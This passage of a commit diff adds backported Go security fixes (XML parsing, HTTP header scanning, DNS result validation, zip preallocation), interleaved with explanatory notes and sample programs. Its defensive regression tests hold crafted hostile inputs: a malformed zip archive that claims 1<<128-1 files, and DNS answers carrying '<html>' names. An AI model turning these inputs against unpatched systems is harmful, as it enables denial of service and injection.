+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a9cfd55e2b09735a25976d1b008a0a3c767494f8
+CVE: CVE-2020-29510
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/encoding/xml/xml.go | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index 01a1460..98647b2 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -768,6 +768,12 @@ func (d *Decoder) rawToken() (Token, error) {
+ }
+ b0, b1 = b1, b
+ }
++
++ // Replace the comment with a space in the returned Directive
++ // body, so that markup parts that were separated by the comment
++ // (like a "<" and a "!") don't get joined when re-encoding the
++ // Directive, taking new semantic meaning.
++ d.buf.WriteByte(' ')
+ }
+ }
+ return Directive(d.buf.Bytes()), nil
+--
+2.7.4
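After this change a comment inside a directive is replaced by a single space in the Directive token, so re-encoding cannot join markup that the comment used to separate. A small token dump that exercises that path (illustrative; the exact whitespace in the output depends on the input):

```
package main

import (
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

func main() {
	const doc = `<!DOCTYPE example [ <!-- comment --> ]><root/>`
	d := xml.NewDecoder(strings.NewReader(doc))
	for {
		tok, err := d.Token()
		if err == io.EOF {
			break
		}
		if err != nil {
			fmt.Println("error:", err)
			return
		}
		// With the fix the comment body is elided and a space is left in
		// its place inside the directive.
		if dir, ok := tok.(xml.Directive); ok {
			fmt.Printf("%q\n", string(dir))
		}
	}
}
```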
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
new file mode 100644
index 0000000000..faa3f7f641
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
@@ -0,0 +1,191 @@
+From d0b79e3513a29628f3599dc8860666b6eed75372 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Mon, 1 Mar 2021 09:54:00 -0500
+Subject: [PATCH] encoding/xml: prevent infinite loop while decoding
+
+This change properly handles a TokenReader which
+returns an EOF in the middle of an open XML
+element.
+
+Thanks to Sam Whited for reporting this.
+
+Fixes CVE-2021-27918
+Fixes #44913
+
+Change-Id: Id02a3f3def4a1b415fa2d9a8e3b373eb6cb0f433
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1004594
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/300391
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Katie Hockman <katie@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Alexander Rakoczy <alex@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/d0b79e3513a29628f3599dc8860666b6eed75372
+CVE: CVE-2021-27918
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/encoding/xml/xml.go | 19 ++++---
+ src/encoding/xml/xml_test.go | 104 +++++++++++++++++++++++++++--------
+ 2 files changed, 92 insertions(+), 31 deletions(-)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index adaf4daf198b9..6f9594d7ba7a3 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -271,7 +271,7 @@ func NewTokenDecoder(t TokenReader) *Decoder {
+ // it will return an error.
+ //
+ // Token implements XML name spaces as described by
+-// https://www.w3.org/TR/REC-xml-names/. Each of the
++// https://www.w3.org/TR/REC-xml-names/. Each of the
+ // Name structures contained in the Token has the Space
+ // set to the URL identifying its name space when known.
+ // If Token encounters an unrecognized name space prefix,
+@@ -285,16 +285,17 @@ func (d *Decoder) Token() (Token, error) {
+ if d.nextToken != nil {
+ t = d.nextToken
+ d.nextToken = nil
+- } else if t, err = d.rawToken(); err != nil {
+- switch {
+- case err == io.EOF && d.t != nil:
+- err = nil
+- case err == io.EOF && d.stk != nil && d.stk.kind != stkEOF:
+- err = d.syntaxError("unexpected EOF")
++ } else {
++ if t, err = d.rawToken(); t == nil && err != nil {
++ if err == io.EOF && d.stk != nil && d.stk.kind != stkEOF {
++ err = d.syntaxError("unexpected EOF")
++ }
++ return nil, err
+ }
+- return t, err
++ // We still have a token to process, so clear any
++ // errors (e.g. EOF) and proceed.
++ err = nil
+ }
+-
+ if !d.Strict {
+ if t1, ok := d.autoClose(t); ok {
+ d.nextToken = t
+diff --git a/src/encoding/xml/xml_test.go b/src/encoding/xml/xml_test.go
+index efddca43e9102..5672ebb375f0d 100644
+--- a/src/encoding/xml/xml_test.go
++++ b/src/encoding/xml/xml_test.go
+@@ -33,30 +33,90 @@ func (t *toks) Token() (Token, error) {
+
+ func TestDecodeEOF(t *testing.T) {
+ start := StartElement{Name: Name{Local: "test"}}
+- t.Run("EarlyEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{earlyEOF: true, t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ tests := []struct {
++ name string
++ tokens []Token
++ ok bool
++ }{
++ {
++ name: "OK",
++ tokens: []Token{
++ start,
++ start.End(),
++ },
++ ok: true,
++ },
++ {
++ name: "Malformed",
++ tokens: []Token{
++ start,
++ StartElement{Name: Name{Local: "bad"}},
++ start.End(),
++ },
++ ok: false,
++ },
++ }
++ for _, tc := range tests {
++ for _, eof := range []bool{true, false} {
++ name := fmt.Sprintf("%s/earlyEOF=%v", tc.name, eof)
++ t.Run(name, func(t *testing.T) {
++ d := NewTokenDecoder(&toks{
++ earlyEOF: eof,
++ t: tc.tokens,
++ })
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if tc.ok && err != nil {
++ t.Fatalf("d.Decode: expected nil error, got %v", err)
++ }
++ if _, ok := err.(*SyntaxError); !tc.ok && !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
+ }
+- })
+- t.Run("LateEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ }
++}
++
++type toksNil struct {
++ returnEOF bool
++ t []Token
++}
++
++func (t *toksNil) Token() (Token, error) {
++ if len(t.t) == 0 {
++ if !t.returnEOF {
++ // Return nil, nil before returning an EOF. It's legal, but
++ // discouraged.
++ t.returnEOF = true
++ return nil, nil
+ }
+- })
++ return nil, io.EOF
++ }
++ var tok Token
++ tok, t.t = t.t[0], t.t[1:]
++ return tok, nil
++}
++
++func TestDecodeNilToken(t *testing.T) {
++ for _, strict := range []bool{true, false} {
++ name := fmt.Sprintf("Strict=%v", strict)
++ t.Run(name, func(t *testing.T) {
++ start := StartElement{Name: Name{Local: "test"}}
++ bad := StartElement{Name: Name{Local: "bad"}}
++ d := NewTokenDecoder(&toksNil{
++ // Malformed
++ t: []Token{start, bad, start.End()},
++ })
++ d.Strict = strict
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if _, ok := err.(*SyntaxError); !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
++ }
+ }
+
+ const testInput = `
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
new file mode 100644
index 0000000000..afe4b0d2b8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
@@ -0,0 +1,38 @@
+From efb465ada003d23353a91ef930be408eb575dba6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 17:40:12 +0530
+Subject: [PATCH] CVE-2021-31525
+
+Upstream-Status: Backport [https://github.com/argoheyard/lang-net/commit/701957006ef151feb43f86aa99c8a1f474f69282]
+CVE: CVE-2021-31525
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/vendor/golang.org/x/net/http/httpguts/httplex.go | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http/httpguts/httplex.go b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+index e7de24e..c79aa73 100644
+--- a/src/vendor/golang.org/x/net/http/httpguts/httplex.go
++++ b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+@@ -137,11 +137,13 @@ func trimOWS(x string) string {
+ // contains token amongst its comma-separated tokens, ASCII
+ // case-insensitively.
+ func headerValueContainsToken(v string, token string) bool {
+- v = trimOWS(v)
+- if comma := strings.IndexByte(v, ','); comma != -1 {
+- return tokenEqual(trimOWS(v[:comma]), token) || headerValueContainsToken(v[comma+1:], token)
++ for comma := strings.IndexByte(v, ','); comma != -1; comma = strings.IndexByte(v, ',') {
++ if tokenEqual(trimOWS(v[:comma]), token) {
++ return true
++ }
++ v = v[comma+1:]
+ }
+- return tokenEqual(v, token)
++ return tokenEqual(trimOWS(v), token)
+ }
+
+ // lowerASCII returns the ASCII lowercase version of b.
+--
+2.25.1
+
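
The change above replaces one recursive call per comma with a loop, so a Connection header stuffed with commas can no longer exhaust the stack. A rough standalone equivalent, using strings.EqualFold and strings.TrimSpace in place of the package's unexported tokenEqual and trimOWS helpers:

package main

import (
	"fmt"
	"strings"
)

// containsToken reports whether value, a comma-separated header value,
// contains token (ASCII case-insensitively). It mirrors the iterative
// scan from the patch above instead of recursing once per comma.
func containsToken(value, token string) bool {
	for comma := strings.IndexByte(value, ','); comma != -1; comma = strings.IndexByte(value, ',') {
		if strings.EqualFold(strings.TrimSpace(value[:comma]), token) {
			return true
		}
		value = value[comma+1:]
	}
	return strings.EqualFold(strings.TrimSpace(value), token)
}

func main() {
	fmt.Println(containsToken("close, TE", "te"))       // true
	fmt.Println(containsToken("keep-alive", "upgrade")) // false
}
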
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
new file mode 100644
index 0000000000..3d9de888ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch
@@ -0,0 +1,373 @@
+From 9324d7e53151e9dfa4b25af994a28c2e0b11f729 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 27 May 2021 10:40:06 -0700
+Subject: [PATCH] net: verify results from Lookup* are valid domain names
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/31d60cda1f58b7558fc5725d2b9e4531655d980e]
+CVE: CVE-2021-33195
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+For the methods LookupCNAME, LookupSRV, LookupMX, LookupNS, and
+LookupAddr check that the returned domain names are in fact valid DNS
+names using the existing isDomainName function.
+
+Thanks to Philipp Jeitner and Haya Shulman from Fraunhofer SIT for
+reporting this issue.
+
+Updates #46241
+Fixes #46356
+Fixes CVE-2021-33195
+
+Change-Id: I47a4f58c031cb752f732e88bbdae7f819f0af4f3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323131
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+(cherry picked from commit cdcd02842da7c004efd023881e3719105209c908)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323269
+---
+ src/net/dnsclient_unix_test.go | 157 +++++++++++++++++++++++++++++++++
+ src/net/lookup.go | 111 ++++++++++++++++++++---
+ 2 files changed, 255 insertions(+), 13 deletions(-)
+
+diff --git a/src/net/dnsclient_unix_test.go b/src/net/dnsclient_unix_test.go
+index 2ad40df..b8617d9 100644
+--- a/src/net/dnsclient_unix_test.go
++++ b/src/net/dnsclient_unix_test.go
+@@ -1800,3 +1800,160 @@ func TestPTRandNonPTR(t *testing.T) {
+ t.Errorf("names = %q; want %q", names, want)
+ }
+ }
++
++func TestCVE202133195(t *testing.T) {
++ fake := fakeDNSServer{
++ rh: func(n, _ string, q dnsmessage.Message, _ time.Time) (dnsmessage.Message, error) {
++ r := dnsmessage.Message{
++ Header: dnsmessage.Header{
++ ID: q.Header.ID,
++ Response: true,
++ RCode: dnsmessage.RCodeSuccess,
++ RecursionAvailable: true,
++ },
++ Questions: q.Questions,
++ }
++ switch q.Questions[0].Type {
++ case dnsmessage.TypeCNAME:
++ r.Answers = []dnsmessage.Resource{}
++ case dnsmessage.TypeA: // CNAME lookup uses a A/AAAA as a proxy
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeA,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.AResource{
++ A: TestAddr,
++ },
++ },
++ )
++ case dnsmessage.TypeSRV:
++ n := q.Questions[0].Name
++ if n.String() == "_hdr._tcp.golang.org." {
++ n = dnsmessage.MustNewName("<html>.golang.org.")
++ }
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: n,
++ Type: dnsmessage.TypeSRV,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.SRVResource{
++ Target: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeMX:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeMX,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.MXResource{
++ MX: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypeNS:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypeNS,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.NSResource{
++ NS: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ case dnsmessage.TypePTR:
++ r.Answers = append(r.Answers,
++ dnsmessage.Resource{
++ Header: dnsmessage.ResourceHeader{
++ Name: dnsmessage.MustNewName("<html>.golang.org."),
++ Type: dnsmessage.TypePTR,
++ Class: dnsmessage.ClassINET,
++ Length: 4,
++ },
++ Body: &dnsmessage.PTRResource{
++ PTR: dnsmessage.MustNewName("<html>.golang.org."),
++ },
++ },
++ )
++ }
++ return r, nil
++ },
++ }
++
++ r := Resolver{PreferGo: true, Dial: fake.DialContext}
++ // Change the default resolver to match our manipulated resolver
++ originalDefault := DefaultResolver
++ DefaultResolver = &r
++ defer func() {
++ DefaultResolver = originalDefault
++ }()
++
++ _, err := r.LookupCNAME(context.Background(), "golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupCNAME("golang.org")
++ if expected := "lookup golang.org: CNAME target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupCNAME returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("target", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, _, err = r.LookupSRV(context.Background(), "hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, _, err = LookupSRV("hdr", "tcp", "golang.org")
++ if expected := "lookup golang.org: SRV header name is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupSRV returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupMX(context.Background(), "golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupMX("golang.org")
++ if expected := "lookup golang.org: MX target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupMX returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupNS(context.Background(), "golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupNS("golang.org")
++ if expected := "lookup golang.org: NS target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupNS returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++
++ _, err = r.LookupAddr(context.Background(), "1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("Resolver.LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++ _, err = LookupAddr("1.2.3.4")
++ if expected := "lookup 1.2.3.4: PTR target is invalid"; err == nil || err.Error() != expected {
++ t.Errorf("LookupAddr returned unexpected error, got %q, want %q", err.Error(), expected)
++ }
++}
+diff --git a/src/net/lookup.go b/src/net/lookup.go
+index 9cebd10..05e88e4 100644
+--- a/src/net/lookup.go
++++ b/src/net/lookup.go
+@@ -364,8 +364,11 @@ func (r *Resolver) LookupPort(ctx context.Context, network, service string) (por
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
+ func LookupCNAME(host string) (cname string, err error) {
+- return DefaultResolver.lookupCNAME(context.Background(), host)
++ return DefaultResolver.LookupCNAME(context.Background(), host)
+ }
+
+ // LookupCNAME returns the canonical name for the given host.
+@@ -378,8 +381,18 @@ func LookupCNAME(host string) (cname string, err error) {
+ // LookupCNAME does not return an error if host does not
+ // contain DNS "CNAME" records, as long as host resolves to
+ // address records.
+-func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string, err error) {
+- return r.lookupCNAME(ctx, host)
++//
++// The returned canonical name is validated to be a properly
++// formatted presentation-format domain name.
++func (r *Resolver) LookupCNAME(ctx context.Context, host string) (string, error) {
++ cname, err := r.lookupCNAME(ctx, host)
++ if err != nil {
++ return "", err
++ }
++ if !isDomainName(cname) {
++ return "", &DNSError{Err: "CNAME target is invalid", Name: host}
++ }
++ return cname, nil
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -391,8 +404,11 @@ func (r *Resolver) LookupCNAME(ctx context.Context, host string) (cname string,
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return DefaultResolver.lookupSRV(context.Background(), service, proto, name)
++ return DefaultResolver.LookupSRV(context.Background(), service, proto, name)
+ }
+
+ // LookupSRV tries to resolve an SRV query of the given service,
+@@ -404,28 +420,82 @@ func LookupSRV(service, proto, name string) (cname string, addrs []*SRV, err err
+ // That is, it looks up _service._proto.name. To accommodate services
+ // publishing SRV records under non-standard names, if both service
+ // and proto are empty strings, LookupSRV looks up name directly.
+-func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (cname string, addrs []*SRV, err error) {
+- return r.lookupSRV(ctx, service, proto, name)
++//
++// The returned service names are validated to be properly
++// formatted presentation-format domain names.
++func (r *Resolver) LookupSRV(ctx context.Context, service, proto, name string) (string, []*SRV, error) {
++ cname, addrs, err := r.lookupSRV(ctx, service, proto, name)
++ if err != nil {
++ return "", nil, err
++ }
++ if cname != "" && !isDomainName(cname) {
++ return "", nil, &DNSError{Err: "SRV header name is invalid", Name: name}
++ }
++ for _, addr := range addrs {
++ if addr == nil {
++ continue
++ }
++ if !isDomainName(addr.Target) {
++ return "", nil, &DNSError{Err: "SRV target is invalid", Name: name}
++ }
++ }
++ return cname, addrs, nil
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupMX(name string) ([]*MX, error) {
+- return DefaultResolver.lookupMX(context.Background(), name)
++ return DefaultResolver.LookupMX(context.Background(), name)
+ }
+
+ // LookupMX returns the DNS MX records for the given domain name sorted by preference.
++//
++// The returned mail server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupMX(ctx context.Context, name string) ([]*MX, error) {
+- return r.lookupMX(ctx, name)
++ records, err := r.lookupMX(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, mx := range records {
++ if mx == nil {
++ continue
++ }
++ if !isDomainName(mx.Host) {
++ return nil, &DNSError{Err: "MX target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func LookupNS(name string) ([]*NS, error) {
+- return DefaultResolver.lookupNS(context.Background(), name)
++ return DefaultResolver.LookupNS(context.Background(), name)
+ }
+
+ // LookupNS returns the DNS NS records for the given domain name.
++//
++// The returned name server names are validated to be properly
++// formatted presentation-format domain names.
+ func (r *Resolver) LookupNS(ctx context.Context, name string) ([]*NS, error) {
+- return r.lookupNS(ctx, name)
++ records, err := r.lookupNS(ctx, name)
++ if err != nil {
++ return nil, err
++ }
++ for _, ns := range records {
++ if ns == nil {
++ continue
++ }
++ if !isDomainName(ns.Host) {
++ return nil, &DNSError{Err: "NS target is invalid", Name: name}
++ }
++ }
++ return records, nil
+ }
+
+ // LookupTXT returns the DNS TXT records for the given domain name.
+@@ -441,14 +511,29 @@ func (r *Resolver) LookupTXT(ctx context.Context, name string) ([]string, error)
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+ //
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++//
+ // When using the host C library resolver, at most one result will be
+ // returned. To bypass the host resolver, use a custom Resolver.
+ func LookupAddr(addr string) (names []string, err error) {
+- return DefaultResolver.lookupAddr(context.Background(), addr)
++ return DefaultResolver.LookupAddr(context.Background(), addr)
+ }
+
+ // LookupAddr performs a reverse lookup for the given address, returning a list
+ // of names mapping to that address.
+-func (r *Resolver) LookupAddr(ctx context.Context, addr string) (names []string, err error) {
+- return r.lookupAddr(ctx, addr)
++//
++// The returned names are validated to be properly formatted presentation-format
++// domain names.
++func (r *Resolver) LookupAddr(ctx context.Context, addr string) ([]string, error) {
++ names, err := r.lookupAddr(ctx, addr)
++ if err != nil {
++ return nil, err
++ }
++ for _, name := range names {
++ if !isDomainName(name) {
++ return nil, &DNSError{Err: "PTR target is invalid", Name: addr}
++ }
++ }
++ return names, nil
+ }
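
The pattern added above is the same for every wrapper: call the unexported lookup, then refuse to return any name that fails the domain-name check. A rough sketch of that validation step; the regular expression here is only a stand-in for the net package's unexported isDomainName and is not the real implementation:

package main

import (
	"fmt"
	"regexp"
)

// validDomain is a simplified approximation of a presentation-format
// domain-name check, used only to illustrate the "validate before
// returning" pattern.
var validDomain = regexp.MustCompile(`^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*\.?$`)

// filterNames rejects any answer that is not a well-formed domain name,
// mirroring how the patched Lookup* wrappers refuse to hand attacker
// controlled strings (such as "<html>.golang.org.") back to callers.
func filterNames(names []string) ([]string, error) {
	for _, n := range names {
		if !validDomain.MatchString(n) {
			return nil, fmt.Errorf("lookup result %q is not a valid domain name", n)
		}
	}
	return names, nil
}

func main() {
	_, err := filterNames([]string{"golang.org.", "<html>.golang.org."})
	fmt.Println(err)
}
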
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
new file mode 100644
index 0000000000..2e2dc62c49
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch
@@ -0,0 +1,124 @@
+From 74242baa4136c7a9132a8ccd9881354442788c8c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Tue, 11 May 2021 11:31:31 -0700
+Subject: [PATCH] archive/zip: only preallocate File slice if reasonably sized
+
+Since the number of files in the EOCD record isn't validated, it isn't
+safe to preallocate Reader.Files using that field. A malformed archive
+can indicate it contains up to 1 << 128 - 1 files. We can still safely
+preallocate the slice by checking if the specified number of files in
+the archive is reasonable, given the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #46242
+Fixes CVE-2021-33196
+
+Change-Id: I3c76d8eec178468b380d87fdb4a3f2cb06f0ee76
+Reviewed-on: https://go-review.googlesource.com/c/go/+/318909
+Trust: Roland Shoemaker <roland@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Joe Tsai <thebrokentoaster@gmail.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Joe Tsai <thebrokentoaster@gmail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33196
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/archive/zip/reader.go | 10 +++++-
+ src/archive/zip/reader_test.go | 59 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+), 1 deletion(-)
+
+Index: go/src/archive/zip/reader.go
+===================================================================
+--- go.orig/src/archive/zip/reader.go
++++ go/src/archive/zip/reader.go
+@@ -84,7 +84,15 @@ func (z *Reader) init(r io.ReaderAt, siz
+ return err
+ }
+ z.r = r
+- z.File = make([]*File, 0, end.directoryRecords)
++ // Since the number of directory records is not validated, it is not
++ // safe to preallocate z.File without first checking that the specified
++ // number of files is reasonable, since a malformed archive may
++ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
++ // header which will be _at least_ 30 bytes we can safely preallocate
++ // if (data size / 30) >= end.directoryRecords.
++ if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++ z.File = make([]*File, 0, end.directoryRecords)
++ }
+ z.Comment = end.comment
+ rs := io.NewSectionReader(r, 0, size)
+ if _, err = rs.Seek(int64(end.directoryOffset), io.SeekStart); err != nil {
+Index: go/src/archive/zip/reader_test.go
+===================================================================
+--- go.orig/src/archive/zip/reader_test.go
++++ go/src/archive/zip/reader_test.go
+@@ -1070,3 +1070,62 @@ func TestIssue12449(t *testing.T) {
+ t.Errorf("Error reading the archive: %v", err)
+ }
+ }
++
++func TestCVE202133196(t *testing.T) {
++ // Archive that indicates it has 1 << 128 -1 files,
++ // this would previously cause a panic due to attempting
++ // to allocate a slice with 1 << 128 -1 elements.
++ data := []byte{
++ 0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x08, 0x08,
++ 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x02,
++ 0x03, 0x62, 0x61, 0x65, 0x03, 0x04, 0x00, 0x00,
++ 0xff, 0xff, 0x50, 0x4b, 0x07, 0x08, 0xbe, 0x20,
++ 0x5c, 0x6c, 0x09, 0x00, 0x00, 0x00, 0x03, 0x00,
++ 0x00, 0x00, 0x50, 0x4b, 0x01, 0x02, 0x14, 0x00,
++ 0x14, 0x00, 0x08, 0x08, 0x08, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0xbe, 0x20, 0x5c, 0x6c, 0x09, 0x00,
++ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x03, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x01, 0x02, 0x03, 0x50, 0x4b, 0x06, 0x06, 0x2c,
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d,
++ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00,
